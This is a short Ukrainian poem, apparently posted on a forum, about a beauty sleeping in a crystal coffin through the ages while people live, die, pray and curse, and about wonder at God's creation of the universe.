    23. Серед тиші мовчазної десь у дальній далечіні Спить та й спить собі красуня в кришталевій домовині. Люди родяться довколо, люди зносяться зірками, Люди гинуть без надії, дні складаються роками. Хтось у дивне небо зносить свою віру з молитвами, Хтось навздогін шле прокльни із брудними матюками. На галявині широкій, біля річки серед поля Височеє храмом місто, утопаюче в тополях. В місті тим живуть як можуть усілякі дивні люди Біч-о-біч великий геній і останняя паскуда. Все, шо є, то є прекрасне, все шо має - й має бути Люди дивляться з надієй у захмарене майбутнє. Боже, дивні твої руки, що цей всесвіт збудували І запалювали зорі, щоб тебе не забували. Спить красуня у печері, що наповнена казками Спить нікому непотрібна, спить закутая віками.
    ×
    ×
    • Створити...

    Важлива інформація

    Використовуючи цей сайт, Ви погоджуєтеся з нашими Умови використання, Політика конфіденційності, Правила, Ми розмістили cookie-файлы на ваш пристрій, щоб допомогти зробити цей сайт кращим. Ви можете змінити налаштування cookie-файлів, або продовжити без зміни налаштувань..